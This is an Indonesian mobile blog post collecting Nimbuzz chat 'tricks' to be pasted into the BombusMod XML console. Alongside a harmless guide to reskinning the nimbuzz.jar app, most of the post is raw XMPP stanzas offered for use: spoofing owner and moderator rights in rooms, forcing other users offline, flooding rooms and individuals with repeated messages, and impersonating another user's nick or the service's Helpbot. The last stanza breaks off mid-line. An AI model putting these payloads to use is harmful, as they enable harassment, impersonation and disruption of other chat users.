peperonity.net
Welcome, guest. You are not logged in.
Log in or join for free!
 
Forgot login details?

For free!
Get started!

Mobile Blog


zelda - Comics/Fantasy/Anime
adink870.peperonity.net

Trik Bombos.............

09.09.2009 02:22 EDT
ini ada beberap trik menggunakan bombus, blum bsa di copy paste jd di catat aj ea ^.^
trik menjadi admin palsu
<presence id="Nimbuzz_EnterReservedRoom" from="nick_kamu@nimbuzz.com/" to="nama_room@conference.nimbuzz.com/nickname_kamu_dirom"><x xmlns="http://jabber.org/protocol/muc#user"><item jid="nick_kamu@nimbuzz.com/" affiliation="owner" role="moderator"/></x></presence>

Trik menggantung pesan di rum
<message to="nama.rum@conference.nimbuzz.com" type="groupchat"><subject>/me has change the subject :</subject><body>/me : has changed the subject to:terserah lo</body></message>

trik menggantung nick(Aq sendiri blum bsa makex,tp coba aj syapa tau u bsa, n klo bisa kasi tau aq ea ^.^
<presence><priority>1</priority></presence><presence type="unavailable"><priority>1</priority></presence>
semua trik2 di atas dimasukan melalui xml console bombusmod ,jd u mesti pake bombusmod dulu,
cara masukinnya
menu->peralatan->xml console->enable->baru->masukin kode2 diatas dah berezz





Percaya gak sich . skin/background nimbuzz bisa kamu bikin sesukamu dengan tanpa perlu software aneh-aneh (djdecompiler, JDK,etc.). tapi cukup dengan sofware standart pc aj.
siapin pc, nimbuzz.jar, winzip/winrar/tar, notepad, image viewer/edit (apa aja), gue gunain bawain office karena yang dibutuhkan cuma bisa edit (crop/bright/resize etc.) image *.jpg export ke *.png doang.
oke mulai klik kanan file nimbuzz.jar pilih open white (cari unpack aplikasi) misal winRAR, kemudian buka file Meta-inf >MANIFEST.MF.
Manifest-Version: 1.0
MIDlet-Name: Nimbuzz
MIDlet-Version: 0.9.4
MIDlet-Vendor: Buzzaa Media Group
MIDlet-Icon: /nimbuzz.png
MIDlet-Data-Size: 20000
MIDlet-1: Nimbuzz,/nimbuzz.png,com.nimbuzz.Nimbuzz
Copyright: (c) Nimbuzz 2006-2008
MicroEdition-Configuration: CLDC-1.0
MicroEdition-Profile: MIDP-2.0
Polish-Version: 1.3<beta4-preview> (2006-06-08)
ganti MIDlet name dengan nama sesukamu.. agar waktu di instal nggak terjadi crash name dg nimbuzz yang ada di hp kamu. text yang laen coba aja kira2 mana yang bisa di ganti. oke save.
naik keatas bro (dalam window winrar) cari file baground png perhatiin berapa kb juga extensinya.
udah bro, beralih ke file pict kamu buka n edit. samain dengan file backround.png (baik name, ukuran atau ext). selesai ok. ctrl+c aja, pindah ke window winRAR ini terahir bro dah capek. tekan ctrl+v. beres
kamu juga bisa ganti file-file *.png yang laen. coba aja.
oleh : eliash

TRIK XML BOMBUSMOD
Monday, 13. April 2009, 10:59:02
Code XML, Script XML Bombusmod, plud private, Disconect nimbuzz java. Hidden nick dkontak list t, kloning nick, gantung nick diroom, ubah versi dan tampilan bombusmod, gantung nick, buat subject di room, hidden nick diroom, plud room, buat nickname kosong
1. Kick Nimbuzz java di room
Petama kirim script gantung nick via xml lalu masuk ke room tersebit kemudian kirim script berikut :
<presence to="NAMA_ROOM@conference.nimbuzz.com"><priority>0</priority><x xmlns="http://jabber.org/protocol/muc#user"><item jid="boyzaq@nimbuzz.com/Mobile phone" affiliation="owner" role="moderator"/><status code="201"/></x></presence>
nah dengan begitu nimbuzz java yang ada diroom tersebut akan dc dan selama kamu ada didalam nimbuzz java nggak akan bisa masuk keroom. truz gimana agar kita nggak left kamu tinggal gantung aja nick kamu. mudahkan

2. nyangkutinn nick di room
<presence><priority>1</priority></presence><presence type="unavailable"><priority>1</priority></presence>
Dengan catatan :
1. kirim script tsb terlebih dahulu via xml concsule
2. masuk diroom yang dituju
3. silahkan keluar dengan cara kasar dengan menekan tombol merah dhp kamu tahan hingga reconect

3. jadi owner gadungan ato palsu
<presence id="Nimbuzz_EnterReservedRoom" from="nick_kamu@nimbuzz.com/" to="nama_room@conference.nimbuzz.com/nickname_kamu_dirom"><x xmlns="http://jabber.org/protocol/muc#user"><item jid="nick_kamu@nimbuzz.com/" affiliation="owner" role="moderator"/></x></presence>

4. flood entered + Flood Pesan
<presence to="nama_room@conference.nimbuzz.com/niknamekamu_diroom"><priority>1</priority></presence><message to="nama_room@conference.nimbuzz.com" type="groupchat"><body>bilang fuck u pada boy:D:D:P</body></message><message to="nama_room@conference.nimbuzz.com" type="groupchat"><body>bilang fuck u pada boy:D:D:P</body></message><message to="nama_room@conference.nimbuzz.com" type="groupchat"><body>bilang fuck u pada boy:D:D:P</body></message><message to="nama_room@conference.nimbuzz.com" type="groupchat"><body>bilang fuck u pada boy:D:D:P</body></message><message to="nama_room@conference.nimbuzz.com" type="groupchat"><body>bilang fuck u pada boy:D:D:P</body></message><presence to="nama_room@conference.nimbuzz.com/nicknamekamu_dirom"type="unavailable"/>

5. Flood Entered left room
<presence to="nama_room@conference.nimbuzz.com/nick_name_kamu_ke-1"><priority>1</priority></presence> <presence to="nama_room@conference.nimbuzz.com/nikc_name_kamu_ke-1"type="unavailable"/> <presence to="nama_room@conference.nimbuzz.com/nick_name_kamu_ke-2"><priority>1</priority></presence> <presence to="nama_room@conference.nimbuzz.com/nikc_name_kamu_ke-2"type="unavailable"/> <presence to="nama_room@conference.nimbuzz.com/nick_name_kamu_ke-3"><priority>1</priority></presence> <presence to="nama_room@conference.nimbuzz.com/nikc_name_kamu_ke-3"type="unavailable"/>

6. flood Goyang
<message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>... ...</body></message><message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>.... ...</body></message><message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>... ...</body></message><message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>.... ...</body></message><message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>... ...</body></message><message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>.... ...</body></message><message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>... ...</body></message><message to="nick sasaran kamu@nimbuzz.com/" type="chat"> <body>.... ...</body></message>

7. Buat Subjeck?Topik Di Room
<message to="nama_room@conference.nimbuzz.com" type="groupchat"><subject>kalimat 1</subject><body>/me :KALIMAT SUBJECK/TOPIK</body></message>

8. Jadi Owner Gadungan/Palsu
<presence id="Nimbuzz_EnterReservedRoom" from="nick_kamu@nimbuzz.com/" to="nama_room@conference.nimbuzz.com/nickname_kamu_diroom"><x xmlns="http://jabber.org/protocol/muc#user"><item jid="nick_kamu@nimbuzz.com/" affiliation="owner" role="moderator"/></x></presence>

9.Hidden Dikontak list
<presence to="nimbuzz.com" type="unavailable"/>

10. Klon nick sempurna
<presence from="5y4friz4l...@nimbuzz.com" to="nama_rum@conference.nimbuzz.com/????????????nick_target" type="available"><c xmlns="http://jabber.org/protocol/caps" node="" ver="" hash="sha-1"/><nick xmlns="http://jabber.org/protocol/nick">????????????</nick><x xmlns="http://jabber.org/protocol/muc#user"><item jid="" affiliation="owner" role="moderator"/></x></presence>

11. Minjam jid helbot buat diroom
<presence from="5y4friz4l...@nimbuzz.com" to="nama_rum@conference.nimbuzz.com/????????????Helpbot" type="available"><c xmlns="http://jabber.org/protocol/caps


This page:




Help/FAQ | Terms | Imprint
Home People Pictures Videos Sites Blogs Chat
Top
.